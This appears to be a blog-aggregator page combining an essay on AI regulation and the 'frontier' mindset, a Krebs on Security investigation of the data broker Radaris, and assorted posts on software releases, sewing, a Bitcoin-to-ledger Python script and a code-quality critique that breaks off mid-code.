Pioneers of self-driving vehicles tried to skip permitting processes and used fake demonstrations of their capabilities to avoid government regulation and entice consumers. Meanwhile, AI companies’ hope is that they won’t be held to blame if the AI tools they produce spew out harmful content that causes damage in the real world. They are trying to use the same liability shield that fostered Big Tech’s exploitation of the previous electronic frontiers—the web and social media—to protect their own actions.

Even where we have concrete rules governing deleterious behavior, some hope that using AI is itself enough to skirt them. Copyright infringement is illegal if a person does it, but would that same person be punished if they train a large language model to regurgitate copyrighted works? In the political sphere, the Federal Election Commission has precious few powers to police political advertising; some wonder if they simply won’t be considered relevant if people break those rules using AI.

AI and American Exceptionalism

Like The United States’ historical frontier, AI has a feel of American exceptionalism. Historically, we believed we were different from the Old World powers of Europe because we enjoyed the manifest destiny of unrestrained expansion between the oceans. Today, we have the most CPU power, the most data scientists, the most venture-capitalist investment, and the most AI companies. This exceptionalism has historically led many Americans to believe they don’t have to play by the same rules as everyone else.

Both historically and in the modern day, this idea has led to deleterious consequences such as militaristic nationalism (leading to justifying of foreign interventions in Iraq and elsewhere), masking of severe inequity within our borders, abdication of responsibility from global treaties on climate and law enforcement, and alienation from the international community. American exceptionalism has also wrought havoc on our country’s engagement with the internet, including lawless spying and surveillance by forces like the National Security Agency.

The same line of thinking could have disastrous consequences if applied to AI. It could perpetuate a nationalistic, Cold War–style narrative about America’s inexorable struggle with China, this time predicated on an AI arms race. Moral exceptionalism justifies why we should be allowed to use tools and weapons that are dangerous in the hands of a competitor, or enemy. It could enable the next stage of growth of the military-industrial complex, with claims of an urgent need to modernize missile systems and drones through using AI. And it could renew a rationalization for violating civil liberties in the US and human rights abroad, empowered by the idea that racial profiling is more objective if enforced by computers.The inaction of Congress on AI regulation threatens to land the US in a regime of de facto American exceptionalism for AI. While the EU is about to pass its comprehensive AI Act, lobbyists in the US have muddled legislative action. While the Biden administration has used its executive authority and federal purchasing power to exert some limited control over AI, the gap left by lack of legislation leaves AI in the US looking like the Wild West—a largely unregulated frontier.The lack of restraint by the US on potentially dangerous AI technologies has a global impact. First, its tech giants let loose their products upon the global public, with the harms that this brings with it. Second, it creates a negative incentive for other jurisdictions to more forcefully regulate AI. The EU’s regulation of high-risk AI use cases begins to look like unilateral disarmament if the US does not take action itself. Why would Europe tie the hands of its tech competitors if the US refuses to do the same?

AI and Unbridled Growth

The fundamental problem with frontiers is that they seem to promise cost-free growth. There was a constant pressure for American westward expansion because a bigger, more populous country accrues more power and wealth to the elites and because, for any individual, a better life was always one more wagon ride away into “empty” terrain. AI presents the same opportunities. No matter what field you’re in or what problem you’re facing, the attractive opportunity of AI as a free labor multiplier probably seems like the solution; or, at least, makes for a good sales pitch.

That would actually be okay, except that the growth isn’t free. America’s imperial expansion displaced, harmed, and subjugated native peoples in the Americas, Africa, and the Pacific, while enlisting poor whites to participate in the scheme against their class interests. Capitalism makes growth look like the solution to all problems, even when it’s clearly not. The problem is that so many costs are externalized. Why pay a living wage to human supervisors training AI models when an outsourced gig worker will do it at a fraction of the cost? Why power data centers with renewable energy when it’s cheaper to surge energy production with fossil fuels? And why fund social protections for wage earners displaced by automation if you don’t have to? The potential of consumer applications of AI, from personal digital assistants to self-driving cars, is irresistible; who wouldn’t want a machine to take on the most routinized and aggravating tasks in your daily life? But the externalized cost for consumers is accepting the inevitability of domination by an elite who will extract every possible profit from AI services.

Controlling Our Frontier Impulses

None of these harms are inevitable. Although the structural incentives of capitalism and its growth remain the same, we can make different choices about how to confront them.

We can strengthen basic democratic protections and market regulations to avoid the worst impacts of AI colonialism. We can require ethical employment for the humans toiling to label data and train AI models. And we can set the bar higher for mitigating bias in training and harm from outputs of AI models.

We don’t have to cede all the power and decision making about AI to private actors. We can create an AI public option to provide an alternative to corporate AI. We can provide universal access to ethically built and democratically governed foundational AI models that any individual—or company—could use and build upon.

More ambitiously, we can choose not to privatize the economic gains of AI. We can cap corporate profits, raise the minimum wage, or redistribute an automation dividend as a universal basic income to let everyone share in the benefits of the AI revolution. And, if these technologies save as much labor as companies say they do, maybe we can also all have some of that time back.

And we don’t have to treat the global AI gold rush as a zero-sum game. We can emphasize international cooperation instead of competition. We can align on shared values with international partners and create a global floor for responsible regulation of AI. And we can ensure that access to AI uplifts developing economies instead of further marginalizing them.

This essay was written with Nathan Sanders, and was originally published in Jacobin.

Krebs on SecurityA Close Up Look at the Consumer Data Broker Radaris

If you live in the United States, the data broker Radaris likely knows a great deal about you, and they are happy to sell what they know to anyone. But how much do we know about Radaris? Publicly available data indicates that in addition to running a dizzying array of people-search websites, the co-founders of Radaris operate multiple Russian-language dating services and affiliate programs. It also appears many of their businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.

Formed in 2009, Radaris is a vast people-search network for finding data on individuals, properties, phone numbers, businesses and addresses. Search for any American’s name in Google and the chances are excellent that a listing for them at Radaris.com will show up prominently in the results.

Radaris reports typically bundle a substantial amount of data scraped from public and court documents, including any current or previous addresses and phone numbers, known email addresses and registered domain names. The reports also list address and phone records for the target’s known relatives and associates. Such information could be useful if you were trying to determine the maiden name of someone’s mother, or successfully answer a range of other knowledge-based authentication questions.

Currently, consumer reports advertised for sale at Radaris.com are being fulfilled by a different people-search company called TruthFinder. But Radaris also operates a number of other people-search properties — like Centeda.com — that sell consumer reports directly and behave almost identically to TruthFinder: That is, reel the visitor in with promises of detailed background reports on people, and then charge a $34.99 monthly subscription fee just to view the results.

The Better Business Bureau (BBB) assigns Radaris a rating of “F” for consistently ignoring consumers seeking to have their information removed from Radaris’ various online properties. Of the 159 complaints detailed there in the last year, several were from people who had used third-party identity protection services to have their information removed from Radaris, only to receive a notice a few months later that their Radaris record had been restored.

What’s more, Radaris’ automated process for requesting the removal of your information requires signing up for an account, potentially providing more information about yourself that the company didn’t already have (see screenshot above).

Radaris has not responded to requests for comment.

Radaris, TruthFinder and others like them all force users to agree that their reports will not be used to evaluate someone’s eligibility for credit, or a new apartment or job. This language is so prominent in people-search reports because selling reports for those purposes would classify these firms as consumer reporting agencies (CRAs) and expose them to regulations under the Fair Credit Reporting Act (FCRA).

These data brokers do not want to be treated as CRAs, and for this reason their people search reports typically do not include detailed credit histories, financial information, or full Social Security Numbers (Radaris reports include the first six digits of one’s SSN).

But in September 2023, the U.S. Federal Trade Commission found that TruthFinder and another people-search service Instant Checkmate were trying to have it both ways. The FTC levied a $5.8 million penalty against the companies for allegedly acting as CRAs because they assembled and compiled information on consumers into background reports that were marketed and sold for employment and tenant screening purposes.

An excerpt from the FTC’s complaint against TruthFinder and Instant Checkmate.

The FTC also found TruthFinder and Instant Checkmate deceived users about background report accuracy. The FTC alleges these companies made millions from their monthly subscriptions using push notifications and marketing emails that claimed that the subject of a background report had a criminal or arrest record, when the record was merely a traffic ticket.

“All the while, the companies touted the accuracy of their reports in online ads and other promotional materials, claiming that their reports contain “the MOST ACCURATE information available to the public,” the FTC noted. The FTC says, however, that all the information used in their background reports is obtained from third parties that expressly disclaim that the information is accurate, and that TruthFinder and Instant Checkmate take no steps to verify the accuracy of the information.

The FTC said both companies deceived customers by providing “Remove” and “Flag as Inaccurate” buttons that did not work as advertised. Rather, the “Remove” button removed the disputed information only from the report as displayed to that customer; however, the same item of information remained visible to other customers who searched for the same person.

The FTC also said that when a customer flagged an item in the background report as inaccurate, the companies never took any steps to investigate those claims, to modify the reports, or to flag to other customers that the information had been disputed.

WHO IS RADARIS?

According to Radaris’ profile at the investor website Pitchbook.com, the company’s founder and “co-chief executive officer” is a Massachusetts resident named Gary Norden, also known as Gary Nard.

An analysis of email addresses known to have been used by Mr. Norden shows he is a native Russian man whose real name is Igor Lybarsky (also spelled Lubarsky). Igor’s brother Dmitry, who goes by “Dan,” appears to be the other co-CEO of Radaris. Dmitry Lybarsky’s Facebook/Meta account says he was born in March 1963.

The Lybarsky brothers Dmitry or “Dan” (left) and Igor a.k.a. “Gary,” in an undated photo.

Indirectly or directly, the Lybarskys own multiple properties in both Sherborn and Wellesley, Mass. However, the Radaris website is operated by an offshore entity called Bitseller Expert Ltd, which is incorporated in Cyprus. Neither Lybarsky brother responded to requests for comment.

A review of the domain names registered by Gary Norden shows that beginning in the early 2000s, he and Dan built an e-commerce empire by marketing prepaid calling cards and VOIP services to Russian expatriates who are living in the United States and seeking an affordable way to stay in touch with loved ones back home.

A Sherborn, Mass. property owned by Barsky Real Estate Trust and Dmitry Lybarsky.

In 2012, the main company in charge of providing those calling services — Wellesley Hills, Mass-based Unipoint Technology Inc. — was fined $179,000 by the U.S. Federal Communications Commission, which said Unipoint never applied for a license to provide international telecommunications services.

DomainTools.com shows the email address gnard@unipointtech.com is tied to 137 domains, including radaris.com. DomainTools also shows that the email addresses used by Gary Norden for more than two decades — epop@comby.com, gary@barksy.com and gary1@eprofit.com, among others — appear in WHOIS registration records for an entire fleet of people-search websites, including: centeda.com, virtory.com, clubset.com, kworld.com, newenglandfacts.com, and pub360.com.

Still more people-search platforms tied to Gary Norden– like publicreports.com and arrestfacts.com — currently funnel interested customers to third-party search companies, such as TruthFinder and PersonTrust.com.

The email addresses used by Gary Nard/Gary Norden are also connected to a slew of data broker websites that sell reports on businesses, real estate holdings, and professionals, including bizstanding.com, homemetry.com, trustoria.com, homeflock.com, rehold.com, difive.com and projectlab.com.

AFFILIATE & ADULT

Domain records indicate that Gary and Dan for many years operated a now-defunct pay-per-click affiliate advertising network called affiliate.ru. That entity used domain name servers tied to the aforementioned domains comby.com and eprofit.com, as did radaris.ru.

A machine-translated version of Affiliate.ru, a Russian-language site that advertised hundreds of money making affiliate programs, including the Comfi.com prepaid calling card affiliate.

Comby.com used to be a Russian language social media network that looked a great deal like Facebook. The domain now forwards visitors to Privet.ru (“hello” in Russian), a dating site that claims to have 5 million users. Privet.ru says it belongs to a company called Dating Factory, which lists offices in Switzerland. Privet.ru uses the Gary Norden domain eprofit.com for its domain name servers.

Dating Factory’s website says it sells “powerful dating technology” to help customers create unique or niche dating websites. A review of the sample images available on the Dating Factory homepage suggests the term “dating” in this context refers to adult websites. Dating Factory also operates a community called FacebookOfSex, as well as the domain analslappers.com.

RUSSIAN AMERICA

Email addresses for the Comby and Eprofit domains indicate Gary Norden operates an entity in Wellesley Hills, Mass. called RussianAmerican Holding Inc. (russianamerica.com). This organization is listed as the owner of the domain newyork.ru, which is a site dedicated to orienting newcomers from Russia to the Big Apple.

Newyork.ru’s terms of service refer to an international calling card company called ComFi Inc. (comfi.com) and list an address as PO Box 81362 Wellesley Hills, Ma. Other sites that include this address are russianamerica.com, russianboston.com, russianchicago.com, russianla.com, russiansanfran.com, russianmiami.com, russiancleveland.com and russianseattle.com (currently offline).

ComFi is tied to Comfibook.com, which was a search aggregator website that collected and published data from many online and offline sources, including phone directories, social networks, online photo albums, and public records.

The current website for russianamerica.com. Note the ad in the bottom left corner of this image for Channel One, a Russian state-owned media firm that is currently sanctioned by the U.S. government.

AMERICAN RUSSIAN MEDIA

Many of the U.S. city-specific online properties apparently tied to Gary Norden include phone numbers on their contact pages for a pair of Russian media and advertising firms based in southern California. The phone number 323-874-8211 appears on the websites russianla.com, russiasanfran.com, and rosconcert.com, which sells tickets to theater events performed in Russian.

Historic domain registration records from DomainTools show rosconcert.com was registered in 2003 to Unipoint Technologies — the same company fined by the FCC for not having a license. Rosconcert.com also lists the phone number 818-377-2101.

A phone number just a few digits away — 323-874-8205 — appears as a point of contact on newyork.ru, russianmiami.com, russiancleveland.com, and russianchicago.com. A search in Google shows this 82xx number range — and the 818-377-2101 number — belong to two different entities at the same UPS Store mailbox in Tarzana, Calif: American Russian Media Inc. (armediacorp.com), and Lamedia.biz.

Armediacorp.com is the home of FACT Magazine, a glossy Russian-language publication put out jointly by the American-Russian Business Council, the Hollywood Chamber of Commerce, and the West Hollywood Chamber of Commerce.

Lamedia.biz says it is an international media organization with more than 25 years of experience within the Russian-speaking community on the West Coast. The site advertises FACT Magazine and the Russian state-owned media outlet Channel One. Clicking the Channel One link on the homepage shows Lamedia.biz offers to submit advertising spots that can be shown to Channel One viewers. The price for a basic ad is listed at $500.

In May 2022, the U.S. government levied financial sanctions against Channel One that bar US companies or citizens from doing business with the company.

The website of lamedia.biz offers to sell advertising on two Russian state-owned media firms currently sanctioned by the U.S. government.

LEGAL ACTIONS AGAINST RADARIS

In 2014, a group of people sued Radaris in a class-action lawsuit claiming the company’s practices violated the Fair Credit Reporting Act. Court records indicate the defendants never showed up in court to dispute the claims, and as a result the judge eventually awarded the plaintiffs a default judgement and ordered the company to pay $7.5 million.

But the plaintiffs in that civil case had a difficult time collecting on the court’s ruling. In response, the court ordered the radaris.com domain name (~9.4M monthly visitors) to be handed over to the plaintiffs.

However, in 2018 Radaris was able to reclaim their domain on a technicality. Attorneys for the company argued that their clients were never named as defendants in the original lawsuit, and so their domain could not legally be taken away from them in a civil judgment.

“Because our clients were never named as parties to the litigation, and were never served in the litigation, the taking of their property without due process is a violation of their rights,” Radaris’ attorneys argued.

In October 2023, an Illinois resident filed a class-action lawsuit against Radaris for allegedly using people’s names for commercial purposes, in violation of the Illinois Right of Publicity Act.

On Feb. 8, 2024, a company called Atlas Data Privacy Corp. sued Radaris LLC for allegedly violating “Daniel’s Law,” a statute that allows New Jersey law enforcement, government personnel, judges and their families to have their information completely removed from people-search services and commercial data brokers. Atlas has filed at least 140 similar Daniel’s Law complaints against data brokers recently.

Daniel’s Law was enacted in response to the death of 20-year-old Daniel Anderl, who was killed in a violent attack targeting a federal judge (his mother). In July 2020, a disgruntled attorney who had appeared before U.S. District Judge Esther Salas disguised himself as a Fedex driver, went to her home and shot and killed her son (the judge was unharmed and the assailant killed himself).

Earlier this month, The Record reported on Atlas Data Privacy’s lawsuit against LexisNexis Risk Data Management, in which the plaintiffs representing thousands of law enforcement personnel in New Jersey alleged that after they asked for their information to remain private, the data broker retaliated against them by freezing their credit and falsely reporting them as identity theft victims.

Another data broker sued by Atlas Data Privacy — pogodata.com — announced on Mar. 1 that it was likely shutting down because of the lawsuit.

“The matter is far from resolved but your response motivates us to try to bring back most of the names while preserving redaction of the 17,000 or so clients of the redaction company,” the company wrote. “While little consolation, we are not alone in the suit – the privacy company sued 140 property-data sites at the same time as PogoData.”

Atlas says their goal is convince more states to pass similar laws, and to extend those protections to other groups such as teachers, healthcare personnel and social workers. Meanwhile, media law experts say they’re concerned that enacting Daniel’s Law in other states would limit the ability of journalists to hold public officials accountable, and allow authorities to pursue criminals charges against media outlets that publish the same type of public and governments records that fuel the people-search industry.

PEOPLE-SEARCH CARVE-OUTS

There are some pending changes to the US legal and regulatory landscape that could soon reshape large swaths of the data broker industry. But experts say it is unlikely that any of these changes will affect people-search companies like Radaris.

On Feb. 28, 2024, the White House issued an executive order that directs the U.S. Department of Justice (DOJ) to create regulations that would prevent data brokers from selling or transferring abroad certain data types deemed too sensitive, including genomic and biometric data, geolocation and financial data, as well as other as-yet unspecified personal identifiers. The DOJ this week published a list of more than 100 questions it is seeking answers to regarding the data broker industry.

In August 2023, the Consumer Financial Protection Bureau (CFPB) announced it was undertaking new rulemaking related to data brokers.

Justin Sherman, an adjunct professor at Duke University, said neither the CFPB nor White House rulemaking will likely address people-search brokers because these companies typically get their information by scouring federal, state and local government records. Those government files include voting registries, property filings, marriage certificates, motor vehicle records, criminal records, court documents, death records, professional licenses, bankruptcy filings, and more.

“These dossiers contain everything from individuals’ names, addresses, and family information to data about finances, criminal justice system history, and home and vehicle purchases,” Sherman wrote in an October 2023 article for Lawfare. “People search websites’ business pitch boils down to the fact that they have done the work of compiling data, digitizing it, and linking it to specific people so that it can be searched online.”

Sherman said while there are ongoing debates about whether people search data brokers have legal responsibilities to the people about whom they gather and sell data, the sources of this information — public records — are completely carved out from every single state consumer privacy law.

“Consumer privacy laws in California, Colorado, Connecticut, Delaware, Indiana, Iowa, Montana, Oregon, Tennessee, Texas, Utah, and Virginia all contain highly similar or completely identical carve-outs for ‘publicly available information’ or government records,” Sherman wrote. “Tennessee’s consumer data privacy law, for example, stipulates that “personal information,” a cornerstone of the legislation, does not include ‘publicly available information,’ defined as:

“…information that is lawfully made available through federal, state, or local government records, or information that a business has a reasonable basis to believe is lawfully made available to the general public through widely distributed media, by the consumer, or by a person to whom the consumer has disclosed the information, unless the consumer has restricted the information to a specific audience.”

Sherman said this is the same language as the carve-out in the California privacy regime, which is often held up as the national leader in state privacy regulations. He said with a limited set of exceptions for survivors of stalking and domestic violence, even under California’s newly passed Delete Act — which creates a centralized mechanism for consumers to ask some third-party data brokers to delete their information — consumers across the board cannot exercise these rights when it comes to data scraped from property filings, marriage certificates, and public court documents, for example.

“With some very narrow exceptions, it’s either extremely difficult or impossible to compel these companies to remove your information from their sites,” Sherman told KrebsOnSecurity. “Even in states like California, every single consumer privacy law in the country completely exempts publicly available information.”

Below is a mind map that helped KrebsOnSecurity track relationships between and among the various organizations named in the story above:

A mind map of various entities apparently tied to Radaris and the company’s co-founders. Click to enlarge.

Worse Than FailureError'd: Time for more leap'd years

Inability to properly program dates continued to afflict various websites last week, even though the leap day itself had passed. Maybe we need a new programming language in which it's impossible to forget about timezones, leap years, or Thursday.

Timeless Thomas subtweeted "I'm sure there's a great date-related WTF story behind this tweet" Gosh, I can't imagine what error this could be referring to.

date

 

Data historian Jonathan babbled "Today, the 1st of March, is the start of a new tax year here and my brother wanted to pull the last years worth of transactions from a financial institution to declare his taxes. Of course the real WTF is that they only allow up to 12 months." I am not able rightly to apprehend the confusion of ideas that could provoke such an error'd.

leap

 

Ancient Matthew S. breathed a big sigh of relief on seeing this result: "Good to know that I'm up to date as of 422 years ago!"

05

 

Jaroslaw gibed "Looks like a translation mishap... What if I didn't knew English?" Indeed.

vlsc

 

Hardjay vexillologist Julien casts some shade without telling us where to direct our disdain "I don't think you can have dark mode country flags..." He's not wrong.

flag

 

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

365 TomorrowsAsk the Thompsons

Author: Jennifer Thomas Get advice from three generations of Thompson women: Sara (age 90), Lydia (age 60), and Willa (age 15)! They all receive the same questions but answer independently. Today they discuss the most-asked question of the year! Dear Thompsons, My partner and I are arguing about whether to have children. I want a […]

The post Ask the Thompsons appeared first on 365tomorrows.

xkcdPhysics vs. Magic

Planet DebianReproducible Builds (diffoscope): diffoscope 260 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 260. This version includes the following changes:

[ Chris Lamb ]
* Actually test 7z support in the test_7z set of tests, not the lz4
  functionality. (Closes: reproducible-builds/diffoscope#359)
* In addition, correctly check for the 7z binary being available
  (and not lz4) when testing 7z.
* Prevent a traceback when comparing a contentful .pyc file with an
  empty one. (Re: Debian:#1064973)

You find out more by visiting the project homepage.

Planet DebianValhalla's Things: Denim Waistcoat

Posted on March 8, 2024
Tags: madeof:atoms, craft:sewing, FreeSoftWear

A woman wearing a single breasted waistcoat with double darts at the waist, two pocket flaps at the waist and one on the left upper breast. It has four jeans buttons.

I had finished sewing my jeans, I had a scant 50 cm of elastic denim left.

Unrelated to that, I had just finished drafting a vest with Valentina, after the Cutters’ Practical Guide to the Cutting of Ladies Garments.

A new pattern requires a (wearable) mockup. 50 cm of leftover fabric require a quick project. The decision didn’t take a lot of time.

As a mockup, I kept things easy: single layer with no lining, some edges finished with a topstitched hem and some with bias tape, and plain tape on the fronts, to give more support to the buttons and buttonholes.

I did add pockets: not real welt ones (too much effort on denim), but simple slits covered by flaps.

a rectangle of pocketing fabric on the wrong side of a denim

piece; there is a slit in the middle that has been finished with topstitching.

To do them I marked the slits, then I cut two rectangles of pocketing fabric that should have been as wide as the slit + 1.5 cm (width of the pocket) + 3 cm (allowances) and twice the sum of as tall as I wanted the pocket to be plus 1 cm (space above the slit) + 1.5 cm (allowances).

Then I put the rectangle on the right side of the denim, aligned so that the top edge was 2.5 cm above the slit, sewed 2 mm from the slit, cut, turned the pocketing to the wrong side, pressed and topstitched 2 mm from the fold to finish the slit.

a piece of pocketing fabric folded in half and sewn on all 3

other sides; it does not lay flat on the right side of the fabric because the finished slit (hidden in the picture) is pulling it.

Then I turned the pocketing back to the right side, folded it in half, sewed the side and top seams with a small allowance, pressed and turned it again to the wrong side, where I sewed the seams again to make a french seam.

And finally, a simple rectangular denim flap was topstitched to the front, covering the slits.

I wasn’t as precise as I should have been and the pockets aren’t exactly the right size, but they will do to see if I got the positions right (I think that the breast one should be a cm or so lower, the waist ones are fine), and of course they are tiny, but that’s to be expected from a waistcoat.

The back of the waistcoat,

The other thing that wasn’t exactly as expected is the back: the pattern splits the bottom part of the back to give it “sufficient spring over the hips”. The book is probably published in 1892, but I had already found when drafting the foundation skirt that its idea of “hips” includes a bit of structure. The “enough steel to carry a book or a cup of tea” kind of structure. I should have expected a lot of spring, and indeed that’s what I got.

To fit the bottom part of the back on the limited amount of fabric I had to piece it, and I suspect that the flat felled seam in the center is helping it sticking out; I don’t think it’s exactly bad, but it is a peculiar look.

Also, I had to cut the back on the fold, rather than having a seam in the middle and the grain on a different angle.

Anyway, my next waistcoat project is going to have a linen-cotton lining and silk fashion fabric, and I’d say that the pattern is good enough that I can do a few small fixes and cut it directly in the lining, using it as a second mockup.

As for the wrinkles, there is quite a bit, but it looks something that will be solved by a bit of lightweight boning in the side seams and in the front; it will be seen in the second mockup and the finished waistcoat.

As for this one, it’s definitely going to get some wear as is, in casual contexts. Except. Well, it’s a denim waistcoat, right? With a very different cut from the “get a denim jacket and rip out the sleeves”, but still a denim waistcoat, right? The kind that you cover in patches, right?

Outline of a sewing machine with teeth and crossed bones below it, and the text “home sewing is killing fashion / and it's illegal”

And I may have screenprinted a “home sewing is killing fashion” patch some time ago, using the SVG from wikimedia commons / the Home Taping is Killing Music page.

And. Maybe I’ll wait until I have finished the real waistcoat. But I suspect that one, and other sewing / costuming patches may happen in the future.

No regrets, as the words on my seam ripper pin say, right? :D

,

Planet DebianDirk Eddelbuettel: prrd 0.0.6 at CRAN: Several Improvements

Thrilled to share that a new version of prrd arrived at CRAN yesterday in a first update in two and a half years. prrd facilitates the parallel running [of] reverse dependency [checks] when preparing R packages. It is used extensively for releases I make of Rcpp, RcppArmadillo, RcppEigen, BH, and others.

prrd screenshot image

The key idea of prrd is simple, and described in some more detail on its webpage and its GitHub repo. Reverse dependency checks are an important part of package development that is easily done in a (serial) loop. But these checks are also generally embarassingly parallel as there is no or little interdependency between them (besides maybe shared build depedencies). See the (dated) screenshot (running six parallel workers, arranged in a split byobu session).

This release, the first since 2021, brings a number of enhancments. In particular, the summary function is now improved in several ways. Josh also put in a nice PR that generalizes some setup defaults and values.

The release is summarised in the NEWS entry:

Changes in prrd version 0.0.6 (2024-03-06)

  • The summary function has received several enhancements:

    • Extended summary is only running when failures are seen.

    • The summariseQueue function now displays an anticipated completion time and remaining duration.

    • The use of optional package foghorn has been refined, and refactored, when running summaries.

  • The dequeueJobs.r scripts can receive a date argument, the date can be parse via anydate if anytime ins present.

  • The enqueeJobs.r now considers skipped package when running 'addfailed' while ensuring selecting packages are still on CRAN.

  • The CI setup has been updated (twice),

  • Enqueing and dequing functions and scripts now support relative directories, updated documentation (#18 by Joshua Ulrich).

Courtesy of my CRANberries, there is also a diffstat report for this release.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianPetter Reinholdtsen: Plain text accounting file from your bitcoin transactions

A while back I wrote a small script to extract the Bitcoin transactions in a wallet in the ledger plain text accounting format. The last few days I spent some time to get it working better with more special cases. In case it can be useful for others, here is a copy:

#!/usr/bin/python3
#  -*- coding: utf-8 -*-
#  Copyright (c) 2023-2024 Petter Reinholdtsen

from decimal import Decimal
import json
import subprocess
import time

import numpy

def format_float(num):
    return numpy.format_float_positional(num, trim='-')

accounts = {
    u'amount' : 'Assets:BTC:main',
}

addresses = {
    '' : 'Assets:bankkonto',
    '' : 'Assets:bankkonto',
}

def exec_json(cmd):
    proc = subprocess.Popen(cmd,stdout=subprocess.PIPE)
    j = json.loads(proc.communicate()[0], parse_float=Decimal)
    return j

def list_txs():
    # get all transactions for all accounts / addresses
    c = 0
    txs = []
    txidfee = {}
    limit=100000
    cmd = ['bitcoin-cli', 'listtransactions', '*', str(limit)]
    if True:
        txs.extend(exec_json(cmd))
    else:
        # Useful for debugging
        with open('transactions.json') as f:
            txs.extend(json.load(f, parse_float=Decimal))
    #print txs
    for tx in sorted(txs, key=lambda a: a['time']):
#        print tx['category']
        if 'abandoned' in tx and tx['abandoned']:
            continue
        if 'confirmations' in tx and 0 >= tx['confirmations']:
            continue
        when = time.strftime('%Y-%m-%d %H:%M', time.localtime(tx['time']))
        if 'message' in tx:
            desc = tx['message']
        elif 'comment' in tx:
            desc = tx['comment']
        elif 'label' in tx:
            desc = tx['label']
        else:
            desc = 'n/a'
        print("%s %s" % (when, desc))
        if 'address' in tx:
            print("  ; to bitcoin address %s" % tx['address'])
        else:
            print("  ; missing address in transaction, txid=%s" % tx['txid'])
        print(f"  ; amount={tx['amount']}")
        if 'fee'in tx:
            print(f"  ; fee={tx['fee']}")
        for f in accounts.keys():
            if f in tx and Decimal(0) != tx[f]:
                amount = tx[f]
                print("  %-20s   %s BTC" % (accounts[f], format_float(amount)))
        if 'fee' in tx and Decimal(0) != tx['fee']:
            # Make sure to list fee used in several transactions only once.
            if 'fee' in tx and tx['txid'] in txidfee \
               and tx['fee'] == txidfee[tx['txid']]:
                True
            else:
                fee = tx['fee']
                print("  %-20s   %s BTC" % (accounts['amount'], format_float(fee)))
                print("  %-20s   %s BTC" % ('Expences:BTC-fee', format_float(-fee)))
                txidfee[tx['txid']] = tx['fee']

        if 'address' in tx and tx['address'] in addresses:
            print("  %s" % addresses[tx['address']])
        else:
            if 'generate' == tx['category']:
                print("  Income:BTC-mining")
            else:
                if amount < Decimal(0):
                    print(f"  Assets:unknown:sent:update-script-addr-{tx['address']}")
                else:
                    print(f"  Assets:unknown:received:update-script-addr-{tx['address']}")

        print()
        c = c + 1
    print("# Found %d transactions" % c)
    if limit == c:
        print(f"# Warning: Limit {limit} reached, consider increasing limit.")

def main():
    list_txs()

main()

It is more of a proof of concept, and I do not expect it to handle all edge cases, but it worked for me, and perhaps you can find it useful too.

To get a more interesting result, it is useful to map accounts sent to or received from to accounting accounts, using the addresses hash. As these will be very context dependent, I leave out my list to allow each user to fill out their own list of accounts. Out of the box, 'ledger reg BTC:main' should be able to show the amount of BTCs present in the wallet at any given time in the past. For other and more valuable analysis, a account plan need to be set up in the addresses hash. Here is an example transaction:

2024-03-07 17:00 Donated to good cause
    Assets:BTC:main                           -0.1 BTC
    Assets:BTC:main                       -0.00001 BTC
    Expences:BTC-fee                       0.00001 BTC
    Expences:donations                         0.1 BTC

It need a running Bitcoin Core daemon running, as it connect to it using bitcoin-cli listtransactions * 100000 to extract the transactions listed in the Wallet.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Planet DebianGuido Günther: Phosh Nightly Package Builds

Tightening the feedback loop Link to heading One thing we notice ever so often is that although Phosh’s source code is publicly available and upcoming changes are open for review the feedback loop between changes being made to the development branch and users noticing the change can still be quiet long. This can be problematic as we ideally want to catch a regression or broken use case triggered by a change on the development branch (aka main) before the general availability of a new version.

Worse Than FailureCodeSOD: A Bit of a Confession

Today, John sends us a confession. This is his code, which was built to handle ISO 8583 messages. As we'll see from some later comments, John knows this is bad.

The ISO 8583 format is used mostly in financial transaction processing, frequently to talk to ATMs, but is likely to show up somewhere in any transaction you do that isn't pure cash.

One of the things the format can support is bitmaps- not the image format, but the "stuff flags into an integer" format. John wrote his own version of this, in C#. It's a long class, so I'm just going to focus on the highlights.

private readonly bool[] bits;

Look, we don't start great. This isn't an absolute mistake, but if you're working on a data structure that is meant to be manipulated via bitwise operations, just lean into it. And yes, if endianness is an issue, you'll need to think a little harder- but you need to think about that anyway. Use clear method names and documentation to make it readable.

In this developer's defense, the bitmap's max size is 128 bits, which doesn't have a native integral type in C#, but a pair of 64-bits would be easier to understand, at least for me. Maybe I've just been infected by low-level programming brainworms. Fine, we're using an array.

Now, one thing that's important, is that we're using this bitmap to represent multiple things.

public bool IsExtendedBitmap
{
	get
	{
		return this.IsFieldSet(1);
	}
}

Note how the 1st bit in this bitmap is the IsExtendedBitmap flag. This controls the length of the total bitmap.

Which, as an aside, they're using IsFieldSet because zero-based indexes are too hard:

public bool IsFieldSet(int field)
{
	return this.bits[field - 1];
}

But things do get worse.

/// <summary>
/// Sets a field
/// </summary>
/// <param name="field">
/// Field to set 
/// </param>
/// <param name="on">
/// Whether or not the field is on 
/// </param>
public void SetField(int field, bool on)
{
	this.bits[field - 1] = on;
	this.bits[0] = false;
	for (var i = 64; i <= 127; i++)
	{
		if (this.bits[i])
		{
			this.bits[0] = true;
			break;
		}
	}
}

I included the comments here because I want to highlight how useless they are. The first line makes sense. Then we set the first bit to false. Which, um, was the IsExtendedBitmap flag. Why? I don't know. Then we iterate across the back half of the bitmap and if there's anything true in there, we set that first bit back to true.

Which, by writing that last paragraph, I've figured out what it's doing: it autodetects whether you're using the higher order bits, and sets the IsExtendedBitmap as appropriate. I'm not sure this is actually correct behavior- what happens if I want to set a higher order bit explicitly to 0?- but I haven't read the spec, so we'll let it slide.

public virtual byte[] ToMsg()
{
	var lengthOfBitmap = this.IsExtendedBitmap ? 16 : 8;
	var data = new byte[lengthOfBitmap];

	for (var i = 0; i < lengthOfBitmap; i++)
	{
		for (var j = 0; j < 8; j++)
		{
			if (this.bits[i * 8 + j])
			{
				data[i] = (byte)(data[i] | (128 / (int)Math.Pow(2, j)));
			}
		}
	}

	if (this.formatter is BinaryFormatter)
	{
		return data;
	}

	IFormatter binaryFormatter = new BinaryFormatter();
